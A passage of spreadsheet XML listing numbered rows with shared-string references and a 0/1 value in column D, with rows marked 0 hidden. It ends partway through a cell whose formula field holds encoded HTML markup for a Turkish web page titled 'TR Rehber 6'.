      <c r="C3031" s="1" t="s">
        <v>4043</v>
      </c>
      <c r="D3031" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3032" hidden="1">
      <c r="A3032" s="1">
        <v>3030.0</v>
      </c>
      <c r="B3032" s="1" t="s">
        <v>1799</v>
      </c>
      <c r="C3032" s="1" t="s">
        <v>4792</v>
      </c>
      <c r="D3032" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3033" hidden="1">
      <c r="A3033" s="1">
        <v>3031.0</v>
      </c>
      <c r="B3033" s="1" t="s">
        <v>2056</v>
      </c>
      <c r="C3033" s="1" t="s">
        <v>2057</v>
      </c>
      <c r="D3033" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3034" hidden="1">
      <c r="A3034" s="1">
        <v>3032.0</v>
      </c>
      <c r="B3034" s="1" t="s">
        <v>4793</v>
      </c>
      <c r="C3034" s="1" t="s">
        <v>4794</v>
      </c>
      <c r="D3034" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3035" hidden="1">
      <c r="A3035" s="1">
        <v>3033.0</v>
      </c>
      <c r="B3035" s="1" t="s">
        <v>4795</v>
      </c>
      <c r="C3035" s="1" t="s">
        <v>4796</v>
      </c>
      <c r="D3035" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3036">
      <c r="A3036" s="1">
        <v>3034.0</v>
      </c>
      <c r="B3036" s="1" t="s">
        <v>4797</v>
      </c>
      <c r="C3036" s="1" t="s">
        <v>4798</v>
      </c>
      <c r="D3036" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3037">
      <c r="A3037" s="1">
        <v>3035.0</v>
      </c>
      <c r="B3037" s="1" t="s">
        <v>4799</v>
      </c>
      <c r="C3037" s="1" t="s">
        <v>4800</v>
      </c>
      <c r="D3037" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3038" hidden="1">
      <c r="A3038" s="1">
        <v>3036.0</v>
      </c>
      <c r="B3038" s="1" t="s">
        <v>953</v>
      </c>
      <c r="C3038" s="1" t="s">
        <v>4801</v>
      </c>
      <c r="D3038" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3039" hidden="1">
      <c r="A3039" s="1">
        <v>3037.0</v>
      </c>
      <c r="B3039" s="1" t="s">
        <v>1111</v>
      </c>
      <c r="C3039" s="1" t="s">
        <v>4802</v>
      </c>
      <c r="D3039" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3040">
      <c r="A3040" s="1">
        <v>3038.0</v>
      </c>
      <c r="B3040" s="1" t="s">
        <v>4803</v>
      </c>
      <c r="C3040" s="1" t="s">
        <v>4804</v>
      </c>
      <c r="D3040" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3041" hidden="1">
      <c r="A3041" s="1">
        <v>3039.0</v>
      </c>
      <c r="B3041" s="1" t="s">
        <v>4805</v>
      </c>
      <c r="C3041" s="1" t="s">
        <v>4806</v>
      </c>
      <c r="D3041" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3042" hidden="1">
      <c r="A3042" s="1">
        <v>3040.0</v>
      </c>
      <c r="B3042" s="1" t="s">
        <v>4807</v>
      </c>
      <c r="C3042" s="1" t="s">
        <v>4808</v>
      </c>
      <c r="D3042" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3043" hidden="1">
      <c r="A3043" s="1">
        <v>3041.0</v>
      </c>
      <c r="B3043" s="1" t="s">
        <v>4809</v>
      </c>
      <c r="C3043" s="1" t="s">
        <v>4810</v>
      </c>
      <c r="D3043" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3044" hidden="1">
      <c r="A3044" s="1">
        <v>3042.0</v>
      </c>
      <c r="B3044" s="1" t="s">
        <v>4811</v>
      </c>
      <c r="C3044" s="1" t="s">
        <v>4812</v>
      </c>
      <c r="D3044" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3045" hidden="1">
      <c r="A3045" s="1">
        <v>3043.0</v>
      </c>
      <c r="B3045" s="1" t="s">
        <v>569</v>
      </c>
      <c r="C3045" s="1" t="s">
        <v>570</v>
      </c>
      <c r="D3045" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3046" hidden="1">
      <c r="A3046" s="1">
        <v>3044.0</v>
      </c>
      <c r="B3046" s="1" t="s">
        <v>464</v>
      </c>
      <c r="C3046" s="1" t="s">
        <v>4813</v>
      </c>
      <c r="D3046" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3047" hidden="1">
      <c r="A3047" s="1">
        <v>3045.0</v>
      </c>
      <c r="B3047" s="1" t="s">
        <v>1666</v>
      </c>
      <c r="C3047" s="1" t="s">
        <v>1667</v>
      </c>
      <c r="D3047" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3048" hidden="1">
      <c r="A3048" s="1">
        <v>3046.0</v>
      </c>
      <c r="B3048" s="1" t="s">
        <v>4814</v>
      </c>
      <c r="C3048" s="1" t="s">
        <v>4815</v>
      </c>
      <c r="D3048" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3049" hidden="1">
      <c r="A3049" s="1">
        <v>3047.0</v>
      </c>
      <c r="B3049" s="1" t="s">
        <v>4816</v>
      </c>
      <c r="C3049" s="1" t="s">
        <v>4817</v>
      </c>
      <c r="D3049" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3050" hidden="1">
      <c r="A3050" s="1">
        <v>3048.0</v>
      </c>
      <c r="B3050" s="1" t="s">
        <v>4818</v>
      </c>
      <c r="C3050" s="1" t="s">
        <v>4819</v>
      </c>
      <c r="D3050" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3051">
      <c r="A3051" s="1">
        <v>3049.0</v>
      </c>
      <c r="B3051" s="1" t="s">
        <v>1774</v>
      </c>
      <c r="C3051" s="1" t="s">
        <v>741</v>
      </c>
      <c r="D3051" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3052" hidden="1">
      <c r="A3052" s="1">
        <v>3050.0</v>
      </c>
      <c r="B3052" s="1" t="s">
        <v>4820</v>
      </c>
      <c r="C3052" s="1" t="s">
        <v>4821</v>
      </c>
      <c r="D3052" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3053">
      <c r="A3053" s="1">
        <v>3051.0</v>
      </c>
      <c r="B3053" s="1" t="s">
        <v>4822</v>
      </c>
      <c r="C3053" s="1" t="s">
        <v>4823</v>
      </c>
      <c r="D3053" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3054" hidden="1">
      <c r="A3054" s="1">
        <v>3052.0</v>
      </c>
      <c r="B3054" s="1" t="s">
        <v>4824</v>
      </c>
      <c r="C3054" s="1" t="s">
        <v>4825</v>
      </c>
      <c r="D3054" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3055" hidden="1">
      <c r="A3055" s="1">
        <v>3053.0</v>
      </c>
      <c r="B3055" s="1" t="s">
        <v>4826</v>
      </c>
      <c r="C3055" s="1" t="s">
        <v>4827</v>
      </c>
      <c r="D3055" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3056" hidden="1">
      <c r="A3056" s="1">
        <v>3054.0</v>
      </c>
      <c r="B3056" s="1" t="s">
        <v>4828</v>
      </c>
      <c r="C3056" s="1" t="s">
        <v>4829</v>
      </c>
      <c r="D3056" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3057">
      <c r="A3057" s="1">
        <v>3055.0</v>
      </c>
      <c r="B3057" s="1" t="s">
        <v>2472</v>
      </c>
      <c r="C3057" s="1" t="s">
        <v>4830</v>
      </c>
      <c r="D3057" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3058">
      <c r="A3058" s="1">
        <v>3056.0</v>
      </c>
      <c r="B3058" s="1" t="s">
        <v>4831</v>
      </c>
      <c r="C3058" s="1" t="s">
        <v>4832</v>
      </c>
      <c r="D3058" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3059" hidden="1">
      <c r="A3059" s="1">
        <v>3057.0</v>
      </c>
      <c r="B3059" s="1" t="s">
        <v>563</v>
      </c>
      <c r="C3059" s="1" t="s">
        <v>4833</v>
      </c>
      <c r="D3059" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3060" hidden="1">
      <c r="A3060" s="1">
        <v>3058.0</v>
      </c>
      <c r="B3060" s="1" t="s">
        <v>4834</v>
      </c>
      <c r="C3060" s="1" t="s">
        <v>4835</v>
      </c>
      <c r="D3060" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3061">
      <c r="A3061" s="1">
        <v>3059.0</v>
      </c>
      <c r="B3061" s="1" t="s">
        <v>4836</v>
      </c>
      <c r="C3061" s="1" t="s">
        <v>4837</v>
      </c>
      <c r="D3061" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3062" hidden="1">
      <c r="A3062" s="1">
        <v>3060.0</v>
      </c>
      <c r="B3062" s="1" t="s">
        <v>803</v>
      </c>
      <c r="C3062" s="1" t="s">
        <v>1568</v>
      </c>
      <c r="D3062" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3063" hidden="1">
      <c r="A3063" s="1">
        <v>3061.0</v>
      </c>
      <c r="B3063" s="1" t="s">
        <v>1183</v>
      </c>
      <c r="C3063" s="1" t="s">
        <v>2588</v>
      </c>
      <c r="D3063" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3064" hidden="1">
      <c r="A3064" s="1">
        <v>3062.0</v>
      </c>
      <c r="B3064" s="1" t="s">
        <v>803</v>
      </c>
      <c r="C3064" s="1" t="s">
        <v>4838</v>
      </c>
      <c r="D3064" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3065" hidden="1">
      <c r="A3065" s="1">
        <v>3063.0</v>
      </c>
      <c r="B3065" s="1" t="s">
        <v>607</v>
      </c>
      <c r="C3065" s="1" t="s">
        <v>3939</v>
      </c>
      <c r="D3065" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3066" hidden="1">
      <c r="A3066" s="1">
        <v>3064.0</v>
      </c>
      <c r="B3066" s="1" t="s">
        <v>3219</v>
      </c>
      <c r="C3066" s="1" t="s">
        <v>3220</v>
      </c>
      <c r="D3066" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3067" hidden="1">
      <c r="A3067" s="1">
        <v>3065.0</v>
      </c>
      <c r="B3067" s="1" t="s">
        <v>4839</v>
      </c>
      <c r="C3067" s="1" t="s">
        <v>4840</v>
      </c>
      <c r="D3067" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3068">
      <c r="A3068" s="1">
        <v>3066.0</v>
      </c>
      <c r="B3068" s="1" t="s">
        <v>4841</v>
      </c>
      <c r="C3068" s="1" t="s">
        <v>4842</v>
      </c>
      <c r="D3068" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3069">
      <c r="A3069" s="1">
        <v>3067.0</v>
      </c>
      <c r="B3069" s="1" t="s">
        <v>4843</v>
      </c>
      <c r="C3069" s="1" t="s">
        <v>4844</v>
      </c>
      <c r="D3069" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3070" hidden="1">
      <c r="A3070" s="1">
        <v>3068.0</v>
      </c>
      <c r="B3070" s="1" t="s">
        <v>4845</v>
      </c>
      <c r="C3070" s="1" t="s">
        <v>4846</v>
      </c>
      <c r="D3070" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3071" hidden="1">
      <c r="A3071" s="1">
        <v>3069.0</v>
      </c>
      <c r="B3071" s="1" t="s">
        <v>1315</v>
      </c>
      <c r="C3071" s="1" t="s">
        <v>4847</v>
      </c>
      <c r="D3071" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3072" hidden="1">
      <c r="A3072" s="1">
        <v>3070.0</v>
      </c>
      <c r="B3072" s="1" t="s">
        <v>140</v>
      </c>
      <c r="C3072" s="1" t="s">
        <v>4848</v>
      </c>
      <c r="D3072" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3073" hidden="1">
      <c r="A3073" s="1">
        <v>3071.0</v>
      </c>
      <c r="B3073" s="1" t="s">
        <v>4849</v>
      </c>
      <c r="C3073" s="1" t="s">
        <v>4850</v>
      </c>
      <c r="D3073" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3074" hidden="1">
      <c r="A3074" s="1">
        <v>3072.0</v>
      </c>
      <c r="B3074" s="1" t="s">
        <v>4851</v>
      </c>
      <c r="C3074" s="1" t="s">
        <v>4852</v>
      </c>
      <c r="D3074" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3075" hidden="1">
      <c r="A3075" s="1">
        <v>3073.0</v>
      </c>
      <c r="B3075" s="1" t="s">
        <v>4648</v>
      </c>
      <c r="C3075" s="1" t="s">
        <v>4853</v>
      </c>
      <c r="D3075" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3076">
      <c r="A3076" s="1">
        <v>3074.0</v>
      </c>
      <c r="B3076" s="1" t="s">
        <v>4854</v>
      </c>
      <c r="C3076" s="1" t="s">
        <v>4855</v>
      </c>
      <c r="D3076" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3077" hidden="1">
      <c r="A3077" s="1">
        <v>3075.0</v>
      </c>
      <c r="B3077" s="1" t="s">
        <v>4856</v>
      </c>
      <c r="C3077" s="1" t="s">
        <v>4857</v>
      </c>
      <c r="D3077" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3078" hidden="1">
      <c r="A3078" s="1">
        <v>3076.0</v>
      </c>
      <c r="B3078" s="1" t="s">
        <v>4858</v>
      </c>
      <c r="C3078" s="1" t="s">
        <v>4859</v>
      </c>
      <c r="D3078" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3079" hidden="1">
      <c r="A3079" s="1">
        <v>3077.0</v>
      </c>
      <c r="B3079" s="1" t="s">
        <v>4860</v>
      </c>
      <c r="C3079" s="1" t="s">
        <v>4861</v>
      </c>
      <c r="D3079" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3080" hidden="1">
      <c r="A3080" s="1">
        <v>3078.0</v>
      </c>
      <c r="B3080" s="1" t="s">
        <v>788</v>
      </c>
      <c r="C3080" s="1" t="s">
        <v>789</v>
      </c>
      <c r="D3080" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3081" hidden="1">
      <c r="A3081" s="1">
        <v>3079.0</v>
      </c>
      <c r="B3081" s="1" t="s">
        <v>914</v>
      </c>
      <c r="C3081" s="1" t="s">
        <v>4862</v>
      </c>
      <c r="D3081" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3082" hidden="1">
      <c r="A3082" s="1">
        <v>3080.0</v>
      </c>
      <c r="B3082" s="1" t="s">
        <v>4863</v>
      </c>
      <c r="C3082" s="1" t="s">
        <v>4864</v>
      </c>
      <c r="D3082" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3083" hidden="1">
      <c r="A3083" s="1">
        <v>3081.0</v>
      </c>
      <c r="B3083" s="1" t="s">
        <v>1451</v>
      </c>
      <c r="C3083" s="1" t="s">
        <v>4865</v>
      </c>
      <c r="D3083" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3084" hidden="1">
      <c r="A3084" s="1">
        <v>3082.0</v>
      </c>
      <c r="B3084" s="1" t="s">
        <v>4866</v>
      </c>
      <c r="C3084" s="1" t="s">
        <v>4867</v>
      </c>
      <c r="D3084" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3085">
      <c r="A3085" s="1">
        <v>3083.0</v>
      </c>
      <c r="B3085" s="1" t="s">
        <v>4868</v>
      </c>
      <c r="C3085" s="1" t="s">
        <v>4869</v>
      </c>
      <c r="D3085" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3086" hidden="1">
      <c r="A3086" s="1">
        <v>3084.0</v>
      </c>
      <c r="B3086" s="1" t="s">
        <v>4870</v>
      </c>
      <c r="C3086" s="1" t="s">
        <v>4871</v>
      </c>
      <c r="D3086" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3087" hidden="1">
      <c r="A3087" s="1">
        <v>3085.0</v>
      </c>
      <c r="B3087" s="1" t="s">
        <v>369</v>
      </c>
      <c r="C3087" s="1" t="s">
        <v>4872</v>
      </c>
      <c r="D3087" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3088" hidden="1">
      <c r="A3088" s="1">
        <v>3086.0</v>
      </c>
      <c r="B3088" s="1" t="s">
        <v>1957</v>
      </c>
      <c r="C3088" s="1" t="s">
        <v>4873</v>
      </c>
      <c r="D3088" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3089" hidden="1">
      <c r="A3089" s="1">
        <v>3087.0</v>
      </c>
      <c r="B3089" s="1" t="s">
        <v>93</v>
      </c>
      <c r="C3089" s="1" t="s">
        <v>3631</v>
      </c>
      <c r="D3089" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3090">
      <c r="A3090" s="1">
        <v>3088.0</v>
      </c>
      <c r="B3090" s="1" t="s">
        <v>4874</v>
      </c>
      <c r="C3090" s="1" t="s">
        <v>4875</v>
      </c>
      <c r="D3090" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3091">
      <c r="A3091" s="1">
        <v>3089.0</v>
      </c>
      <c r="B3091" s="1" t="s">
        <v>879</v>
      </c>
      <c r="C3091" s="1" t="s">
        <v>4876</v>
      </c>
      <c r="D3091" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3092">
      <c r="A3092" s="1">
        <v>3090.0</v>
      </c>
      <c r="B3092" s="1" t="s">
        <v>4877</v>
      </c>
      <c r="C3092" s="1" t="s">
        <v>4878</v>
      </c>
      <c r="D3092" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3093" hidden="1">
      <c r="A3093" s="1">
        <v>3091.0</v>
      </c>
      <c r="B3093" s="1" t="s">
        <v>4879</v>
      </c>
      <c r="C3093" s="1" t="s">
        <v>4880</v>
      </c>
      <c r="D3093" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3094" hidden="1">
      <c r="A3094" s="1">
        <v>3092.0</v>
      </c>
      <c r="B3094" s="1" t="s">
        <v>418</v>
      </c>
      <c r="C3094" s="1" t="s">
        <v>2875</v>
      </c>
      <c r="D3094" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3095" hidden="1">
      <c r="A3095" s="1">
        <v>3093.0</v>
      </c>
      <c r="B3095" s="1" t="s">
        <v>686</v>
      </c>
      <c r="C3095" s="1" t="s">
        <v>687</v>
      </c>
      <c r="D3095" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3096" hidden="1">
      <c r="A3096" s="1">
        <v>3094.0</v>
      </c>
      <c r="B3096" s="1" t="s">
        <v>78</v>
      </c>
      <c r="C3096" s="1" t="s">
        <v>4881</v>
      </c>
      <c r="D3096" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3097" hidden="1">
      <c r="A3097" s="1">
        <v>3095.0</v>
      </c>
      <c r="B3097" s="1" t="s">
        <v>438</v>
      </c>
      <c r="C3097" s="1" t="s">
        <v>4882</v>
      </c>
      <c r="D3097" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3098">
      <c r="A3098" s="1">
        <v>3096.0</v>
      </c>
      <c r="B3098" s="1" t="s">
        <v>4883</v>
      </c>
      <c r="C3098" s="1" t="s">
        <v>4884</v>
      </c>
      <c r="D3098" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3099" hidden="1">
      <c r="A3099" s="1">
        <v>3097.0</v>
      </c>
      <c r="B3099" s="1" t="s">
        <v>1538</v>
      </c>
      <c r="C3099" s="1" t="s">
        <v>4885</v>
      </c>
      <c r="D3099" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3100" hidden="1">
      <c r="A3100" s="1">
        <v>3098.0</v>
      </c>
      <c r="B3100" s="1" t="s">
        <v>2240</v>
      </c>
      <c r="C3100" s="1" t="s">
        <v>4886</v>
      </c>
      <c r="D3100" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3101" hidden="1">
      <c r="A3101" s="1">
        <v>3099.0</v>
      </c>
      <c r="B3101" s="1" t="s">
        <v>2338</v>
      </c>
      <c r="C3101" s="1" t="s">
        <v>4887</v>
      </c>
      <c r="D3101" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3102" hidden="1">
      <c r="A3102" s="1">
        <v>3100.0</v>
      </c>
      <c r="B3102" s="1" t="s">
        <v>4888</v>
      </c>
      <c r="C3102" s="1" t="s">
        <v>4889</v>
      </c>
      <c r="D3102" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3103">
      <c r="A3103" s="1">
        <v>3101.0</v>
      </c>
      <c r="B3103" s="1" t="s">
        <v>3179</v>
      </c>
      <c r="C3103" s="1" t="s">
        <v>3180</v>
      </c>
      <c r="D3103" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3104" hidden="1">
      <c r="A3104" s="1">
        <v>3102.0</v>
      </c>
      <c r="B3104" s="1" t="s">
        <v>4863</v>
      </c>
      <c r="C3104" s="1" t="s">
        <v>4890</v>
      </c>
      <c r="D3104" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3105">
      <c r="A3105" s="1">
        <v>3103.0</v>
      </c>
      <c r="B3105" s="1" t="s">
        <v>4891</v>
      </c>
      <c r="C3105" s="1" t="s">
        <v>4892</v>
      </c>
      <c r="D3105" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3106">
      <c r="A3106" s="1">
        <v>3104.0</v>
      </c>
      <c r="B3106" s="1" t="s">
        <v>4893</v>
      </c>
      <c r="C3106" s="1" t="s">
        <v>4894</v>
      </c>
      <c r="D3106" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3107" hidden="1">
      <c r="A3107" s="1">
        <v>3105.0</v>
      </c>
      <c r="B3107" s="1" t="s">
        <v>1111</v>
      </c>
      <c r="C3107" s="1" t="s">
        <v>1112</v>
      </c>
      <c r="D3107" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3108" hidden="1">
      <c r="A3108" s="1">
        <v>3106.0</v>
      </c>
      <c r="B3108" s="1" t="s">
        <v>4895</v>
      </c>
      <c r="C3108" s="1" t="s">
        <v>4896</v>
      </c>
      <c r="D3108" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3109">
      <c r="A3109" s="1">
        <v>3107.0</v>
      </c>
      <c r="B3109" s="1" t="s">
        <v>4897</v>
      </c>
      <c r="C3109" s="1" t="s">
        <v>4000</v>
      </c>
      <c r="D3109" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3110" hidden="1">
      <c r="A3110" s="1">
        <v>3108.0</v>
      </c>
      <c r="B3110" s="1" t="s">
        <v>4191</v>
      </c>
      <c r="C3110" s="1" t="s">
        <v>4192</v>
      </c>
      <c r="D3110" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3111" hidden="1">
      <c r="A3111" s="1">
        <v>3109.0</v>
      </c>
      <c r="B3111" s="1" t="s">
        <v>4898</v>
      </c>
      <c r="C3111" s="1" t="s">
        <v>4899</v>
      </c>
      <c r="D3111" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3112">
      <c r="A3112" s="1">
        <v>3110.0</v>
      </c>
      <c r="B3112" s="1" t="s">
        <v>4900</v>
      </c>
      <c r="C3112" s="1" t="s">
        <v>4901</v>
      </c>
      <c r="D3112" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3113">
      <c r="A3113" s="1">
        <v>3111.0</v>
      </c>
      <c r="B3113" s="1" t="s">
        <v>4577</v>
      </c>
      <c r="C3113" s="1" t="s">
        <v>4578</v>
      </c>
      <c r="D3113" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3114" hidden="1">
      <c r="A3114" s="1">
        <v>3112.0</v>
      </c>
      <c r="B3114" s="1" t="s">
        <v>1163</v>
      </c>
      <c r="C3114" s="1" t="s">
        <v>4902</v>
      </c>
      <c r="D3114" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3115" hidden="1">
      <c r="A3115" s="1">
        <v>3113.0</v>
      </c>
      <c r="B3115" s="1" t="s">
        <v>1163</v>
      </c>
      <c r="C3115" s="1" t="s">
        <v>4903</v>
      </c>
      <c r="D3115" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3116" hidden="1">
      <c r="A3116" s="1">
        <v>3114.0</v>
      </c>
      <c r="B3116" s="1" t="s">
        <v>2160</v>
      </c>
      <c r="C3116" s="1" t="s">
        <v>2161</v>
      </c>
      <c r="D3116" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3117" hidden="1">
      <c r="A3117" s="1">
        <v>3115.0</v>
      </c>
      <c r="B3117" s="1" t="s">
        <v>2774</v>
      </c>
      <c r="C3117" s="1" t="s">
        <v>4438</v>
      </c>
      <c r="D3117" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3118" hidden="1">
      <c r="A3118" s="1">
        <v>3116.0</v>
      </c>
      <c r="B3118" s="1" t="s">
        <v>4904</v>
      </c>
      <c r="C3118" s="1" t="s">
        <v>4905</v>
      </c>
      <c r="D3118" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3119" hidden="1">
      <c r="A3119" s="1">
        <v>3117.0</v>
      </c>
      <c r="B3119" s="1" t="s">
        <v>4906</v>
      </c>
      <c r="C3119" s="1" t="s">
        <v>4907</v>
      </c>
      <c r="D3119" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3120">
      <c r="A3120" s="1">
        <v>3118.0</v>
      </c>
      <c r="B3120" s="1" t="s">
        <v>4908</v>
      </c>
      <c r="C3120" s="1" t="s">
        <v>4909</v>
      </c>
      <c r="D3120" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3121" hidden="1">
      <c r="A3121" s="1">
        <v>3119.0</v>
      </c>
      <c r="B3121" s="1" t="s">
        <v>426</v>
      </c>
      <c r="C3121" s="1" t="s">
        <v>4910</v>
      </c>
      <c r="D3121" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3122">
      <c r="A3122" s="1">
        <v>3120.0</v>
      </c>
      <c r="B3122" s="1" t="s">
        <v>4911</v>
      </c>
      <c r="C3122" s="1" t="s">
        <v>4912</v>
      </c>
      <c r="D3122" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3123">
      <c r="A3123" s="1">
        <v>3121.0</v>
      </c>
      <c r="B3123" s="1" t="s">
        <v>1713</v>
      </c>
      <c r="C3123" s="1" t="s">
        <v>1714</v>
      </c>
      <c r="D3123" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3124" hidden="1">
      <c r="A3124" s="1">
        <v>3122.0</v>
      </c>
      <c r="B3124" s="1" t="s">
        <v>1985</v>
      </c>
      <c r="C3124" s="1" t="s">
        <v>1986</v>
      </c>
      <c r="D3124" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3125">
      <c r="A3125" s="1">
        <v>3123.0</v>
      </c>
      <c r="B3125" s="1" t="s">
        <v>230</v>
      </c>
      <c r="C3125" s="1" t="s">
        <v>231</v>
      </c>
      <c r="D3125" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3126">
      <c r="A3126" s="1">
        <v>3124.0</v>
      </c>
      <c r="B3126" s="1" t="s">
        <v>4913</v>
      </c>
      <c r="C3126" s="1" t="s">
        <v>4914</v>
      </c>
      <c r="D3126" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="3127" hidden="1">
      <c r="A3127" s="1">
        <v>3125.0</v>
      </c>
      <c r="B3127" s="1" t="s">
        <v>827</v>
      </c>
      <c r="C3127" s="1" t="s">
        <v>3911</v>
      </c>
      <c r="D3127" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3128" hidden="1">
      <c r="A3128" s="1">
        <v>3126.0</v>
      </c>
      <c r="B3128" s="1" t="s">
        <v>2475</v>
      </c>
      <c r="C3128" s="1" t="s">
        <v>2904</v>
      </c>
      <c r="D3128" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3129" hidden="1">
      <c r="A3129" s="1">
        <v>3127.0</v>
      </c>
      <c r="B3129" s="1" t="s">
        <v>711</v>
      </c>
      <c r="C3129" s="1" t="s">
        <v>712</v>
      </c>
      <c r="D3129" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="3130">
      <c r="A3130" s="1">
        <v>3128.0</v>
      </c>
      <c r="B3130" s="1" t="s">
        <v>4915</v>
      </c>
      <c r="C3130" s="3" t="str">
        <f>3Chtml=3E=3Chead=3E=3Cmeta http-equiv=3DContent-Language content=3Dtr=3E=3Cmeta http-equiv=3DContent-Type content=3D=22text=2Fhtml=3B charset=3Dwindows-1254=22=3E=3Ctitle=3ETR Rehber 6=3C=2Ftitle=3E=3C=2Fhead=3E
 =3Cbody background=3D=22http=3A=2F=2Fxyzlm22=2Esitemynet=2Ecom=2Fback1=2Egif=3E=22 topmargin=3D1 leftmargin=3D1 bgcolor=3D=22#CECFFF=22=3E
       =3Cp align=3D=22center=22=3E
       =3Cimg border=3D=222=22 src=3D=22http=3A=2F=2Fxyzlm22=2Esitemynet=2Ecom=2Fbanner1=2Egif=22 align=3D=22center=22 width=3D=22610=22 height=3D=2281=22=3E=3Cdiv align=3D=22center=22=3E
   =3Ccenter=3E
   =3Ctable border=3D1 cellspacing=3D1 style=3D=22border-collapse=3A collapse=22 bordercolor=3D=22#111111=22 width=3D612 id=3DAutoNumber1 height=3D77 bgcolor=3D=22#CECFFF=22 background=3D=22http=3A=2F=2Fxyzlm22=2Esitemynet=2Ecom=2Fback1=2Egif=22=3E=3Ctr=3E
